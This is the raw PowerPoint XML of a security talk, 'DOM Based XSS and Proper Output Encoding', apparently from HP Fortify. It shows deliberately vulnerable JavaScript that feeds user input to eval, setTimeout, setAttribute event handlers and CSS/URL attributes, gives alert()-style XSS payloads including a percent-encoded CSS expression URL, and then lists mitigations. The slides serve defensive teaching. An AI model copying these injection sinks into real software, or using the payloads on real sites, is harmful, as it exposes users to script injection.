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96" r:id="rId3"/>
    <p:sldId id="302" r:id="rId4"/>
    <p:sldId id="303" r:id="rId5"/>
    <p:sldId id="260" r:id="rId6"/>
    <p:sldId id="261" r:id="rId7"/>
    <p:sldId id="310" r:id="rId8"/>
    <p:sldId id="295" r:id="rId9"/>
    <p:sldId id="298" r:id="rId10"/>
    <p:sldId id="263" r:id="rId11"/>
    <p:sldId id="299" r:id="rId12"/>
    <p:sldId id="264" r:id="rId13"/>
    <p:sldId id="301" r:id="rId14"/>
    <p:sldId id="265" r:id="rId15"/>
    <p:sldId id="304" r:id="rId16"/>
    <p:sldId id="306" r:id="rId17"/>
    <p:sldId id="305" r:id="rId18"/>
    <p:sldId id="262" r:id="rId19"/>
    <p:sldId id="267" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="273" r:id="rId22"/>
    <p:sldId id="276" r:id="rId23"/>
    <p:sldId id="268" r:id="rId24"/>
    <p:sldId id="312" r:id="rId25"/>
    <p:sldId id="311" r:id="rId26"/>
    <p:sldId id="269" r:id="rId27"/>
    <p:sldId id="270" r:id="rId28"/>
    <p:sldId id="271" r:id="rId29"/>
    <p:sldId id="275" r:id="rId30"/>
    <p:sldId id="309" r:id="rId31"/>
    <p:sldId id="29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52" autoAdjust="0"/>
    <p:restoredTop sz="84757" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="46" d="100"/>
          <a:sy n="46" d="100"/>
        </p:scale>
        <p:origin x="-8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52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C93AA-9ABA-4FF5-A95F-19FB17479FF8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7CDED-DF39-4304-806D-AC0AF215EA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528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8783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0362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8906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2951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1478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4873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4873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4339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4339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5043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5043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CDED-DF39-4304-806D-AC0AF215EA2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657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A3DA4-5380-4B3C-95C2-93132D40E815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FCD8-6C1E-4F96-9E6A-18B00F9D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DOM Based XSS and Proper Output Encoding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By Abraham Kang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Principal Security Researcher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HP Fortify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2238"/>
            <a:ext cx="8991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DOM Based </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0" smtClean="0"/>
              <a:t>XSS 2 (code evaluating functions)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Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data to code executing JS functions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>executeCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>req.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user_input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>")</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>%&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="2400" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>executeCode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(input) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setInterval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(input, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>x);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2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new Function</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(input);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scriptElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>.text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>= </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>input;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>defineSetter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(‘x’, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>eval</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>); </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>x=input;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r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>window</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[x](input)    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>or     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>top</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>[x</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>](input);   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r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" err="1" smtClean="0"/>
              <a:t>input.replace</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0"/>
              <a:t>(/.+/, function($1) {//code which operates on $1})</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>}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Mitigating DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>2 (code evaluation)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943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Always delimit user input in between quotes (‘ and “)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Don’t execute script code from user input.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use a level of indirection between the contents of script code and user input. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Limit left side operations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>window[</a:t>
            </a:r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] = input;   or  top[</a:t>
            </a:r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] = input</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Use the appropriate layers of encoding or closures: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setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>customFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(‘&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>doubleJavaScriptEncodedData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>%&gt;’, y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)”);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>…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function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>customFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(name) {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alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("Hello" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>name);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}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setTimeout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>((function(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>) {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return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>function() { </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>customFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>param</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>); } })("&lt;%=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>Encoder.encodeForJS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrustedData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)%&gt;"), y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 Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 (Traditional Contexts)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9436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Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data to traditional XSS contexts where the attribute </a:t>
            </a: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smtClean="0"/>
              <a:t>is a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>String:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>buildLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r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document.body.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>style.backgroundImage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>= "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>vbscript:Alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(99))";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linkTag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("link");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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linkTag.setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>rel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>", "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>stylesheet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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linkTag.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>= "data:,*%7bx:expression(alert(2))%7d"; //</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Works</a:t>
            </a:r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linkTag.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = 			"data:,%2a%7b%78%3a%65%78%70%72%65%73%73%69%6f%6e%28%		61%6c%65%72%74%28%32%29%29%7d"; //DOES WORK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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anchorTag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err="1"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>("a"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1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anchorTag.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> = "alert(1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>)";  //DOES NOT WORK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1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document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1" smtClean="0"/>
              <a:t>anchorTag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2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Mitigating DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>3 (Traditional Contexts)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When setting DOM URL attributes:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>URL encode the whole URL if you are using relative URLs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Ensure that the URL passed in starts with https:// and URL encode the rest of the string (if using absolute URLs).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Use a level of indirection for CSS DOM attributes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 Based XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>4 (through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setAttribute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Pass </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> data to DOM methods which coerce strings into their native JS types:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>buildLink</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(input) {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 smtClean="0"/>
              <a:t>linkTag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>("a");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linkTag.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>onclick</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>", "alert(123)");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linkTag.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>setAttribute</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>onmouseover</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>","alert(123)");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document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0"/>
              <a:t>linkTag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400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Mitigating DOM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Based XSS 4 (through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>setAttribute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Do not pass in user controlled script to execute within JavaScript event handlers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Do not allow user controlled input to set the attribute name.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Use the appropriate encoding for the value of the attribute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Additional encoding for usage in function or encode in JS just before use.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linkTag.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setAttribute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onmouseover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”, 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myJSFunc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(‘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&lt;%=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DefaultEncoder.encodeForJavascript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 				</a:t>
            </a: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req.getParameter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(“name”)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’)”);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 XSS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>5 (in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>attribute context)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Because the HTML attribute contexts inherently includes attributes which are not defined in URL, CSS, and event handler contexts their exploitability is limited.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The one major exception is when setting the text node or attribute of a inherently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>dangerous HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>tag (&lt;script&gt;, &lt;object&gt;, etc.).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/*Works in FF3.6 but not in IE8  */</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("script");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>    t = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>document.createTextNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>("alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>textNode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" smtClean="0"/>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>)");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s.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(t);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document.body.appendChild</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(s);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document.scripts</a:t>
            </a:r>
            <a:r>
